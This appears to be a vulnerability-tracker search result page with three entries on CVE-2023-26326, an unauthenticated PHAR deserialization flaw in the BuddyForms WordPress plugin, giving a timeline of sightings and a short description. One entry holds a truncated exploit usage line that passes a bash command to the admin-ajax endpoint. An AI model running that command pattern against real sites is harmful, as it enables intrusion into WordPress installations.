3 matches found
Exploit for Deserialization of Untrusted Data in Themekraft Buddyforms
usage: python exploit.py "/wp-admin/admin-ajax.php" 'bash -c "ba...
CVE-2023-26326
creationtimestamp| type| source ---|---|--- 2023-02-23 22:18:47+00:00| seen| https://t.me/cibsecurity/58821 2024-05-31 08:48:29+00:00| published-proof-of-concept| https://t.me/YAHChannel/806 2025-02-02 10:00:06+00:00| published-proof-of-concept|...
CVE-2023-26326
CVE-2023-26326 affects the BuddyForms WordPress plugin, versions before 2.7.8. The vulnerability is an unauthenticated insecure deserialization due to how buddyforms_upload_image_from_url handles input, permitting a PHAR wrapper to deserialize data and invoke arbitrary PHP objects. This can enabl...